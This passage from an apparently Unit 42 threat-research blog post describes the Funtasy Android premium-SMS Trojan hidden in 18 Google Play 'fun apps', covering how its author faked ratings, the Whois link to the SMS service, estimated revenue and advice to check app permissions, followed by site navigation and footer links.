Figure 4: Additional "fun app" applications, all contain the Funtasy Trojan.

Each of these applications is designed to appear like a legitimate application already in the app store. To raise the ranking of these apps, the author appears to have given many of them five-star ratings. Unfortunately for them, this gave us additional insight into their operation.

To rate and comment on applications, users must have a Google account. One account using the name "Oscar Sanchez" gave high ratings and positive comments to many of the "fun app" applications. He also rated apps made by two additional publishers with the names "MilApps101" and "Milapps102." Between the two of these developers they have produced five applications, and we've found that every one of them contains the Funtasy Trojan. While the name "Oscar Sanchez" may be a pseudonym, [Whois data](https://whois.domaintools.com/funtasymobile.com) indicates it was also used to register the domain hosting the Funtasy Mobile premium SMS service.

In total we've found 18 different applications in the Google Play store that contain the Funtasy Trojan. Each of these files also has the same internal class structure, which is represented by the tree structure below.

![pic 5](https://unit42.paloaltonetworks.com/wp-content/uploads/2014/05/pic-5.png)

Figure 5: Funtasy internal class structure.

Researchers interested in investigating them further can find more information in the table below.

Using this Trojan the attacker could be generating up to 30 euros per month for over 67,000 infected mobile phones. That adds up to 2 million euros per month, but the actual number is likely much lower. Many of the users who downloaded the tool may not be using one of the targeted Spanish or Australian networks.

![grid \`1](http://blog.paloaltonetworks.com/wp-content/uploads/2014/05/grid-1-500x602.png)

Figure 6: List of Android APK files infected with Funtasy Trojan

Users who want to defend against the Funtasy Trojan should not rely on traditional antivirus programs, as they do not currently detect this threat. Common sense is the best defense against these types of abusive programs. While many users breeze past the list of permissions required when installing new apps, readers of this blog should ask themselves, "Does my electronic bible need to read my SMS messages?"

Back to top

### Tags

* [Android](https://unit42.paloaltonetworks.com/tag/android/ "Android")
* [Funtasy](https://unit42.paloaltonetworks.com/tag/funtasy/ "Funtasy")
* [Trojan](https://unit42.paloaltonetworks.com/tag/trojan/ "Trojan")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks](https://unit42.paloaltonetworks.com/tale-3-vulnerabilities-cve-2014-1776-exploit-linked-previous-attacks/ "A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks")

### Related Articles

* [Threat Brief: Widespread Impact of the Axios Supply Chain Attack](https://unit42.paloaltonetworks.com/axios-supply-chain-attack/ "article - table of contents")
* [Converging Interests: Analysis of Threat Clusters Targeting a Southeast Asian Government](https://unit42.paloaltonetworks.com/espionage-campaigns-target-se-asian-government-org/ "article - table of contents")
* [LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices](https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of operation blinder tunnel. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/05_Malware_Category_1920x900-1-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) October 6, 2026 [#### Blinder Tunnel Campaign Targets Iraqi Infrastructure](https://unit42.paloaltonetworks.com/blinder-tunnel-targets-critical-infrastructure/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/tag/advanced-persistent-threat/ "Advanced Persistent Threat")

* [Agent Serpens](https://unit42.paloaltonetworks.com/tag/agent-serpens/ "Agent Serpens")

* [AppDomainManager](https://unit42.paloaltonetworks.com/tag/appdomainmanager/ "AppDomainManager")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/blinder-tunnel-targets-critical-infrastructure/ "Blinder Tunnel Campaign Targets Iraqi Infrastructure")  
  ![Pictorial representation of how K8 operators betray your security posture. A close-up of a futuristic microchip with glowing circuits in vibrant colors, including blue, purple, and orange, reflecting light.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_652069707-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 29, 2026 [#### OperTraitors: How Kubernetes Operators Betray Your Security Posture](https://unit42.paloaltonetworks.com/agentic-ai-kubernetes-operator-risks/)

* [AI](https://unit42.paloaltonetworks.com/tag/ai/ "AI")

* [AI agents](https://unit42.paloaltonetworks.com/tag/ai-agents/ "AI agents")

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/agentic-ai-kubernetes-operator-risks/ "OperTraitors: How Kubernetes Operators Betray Your Security Posture")  
  ![Pictorial representation of a magnifying glass illuminating a glowing orange circular digital circuit interface on a dark, high-tech background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Myth-Busting_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) September 16, 2026 [#### Atomic macOS (AMOS) Stealer Activity](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/)

* [MacOS](https://unit42.paloaltonetworks.com/tag/macos/ "macOS")

* [Threat intelligence](https://unit42.paloaltonetworks.com/tag/threat-intelligence/ "threat intelligence")

* [Unit 42](https://unit42.paloaltonetworks.com/tag/unit-42/ "Unit 42")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/ "Atomic macOS (AMOS) Stealer Activity")  
  ![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/unit42/respond/managed-detection-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* Observability

* [Cortex XCOR](https://www.paloaltonetworks.com/cortex/xcor)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/prepare-for-emerging-risks/continuous-frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
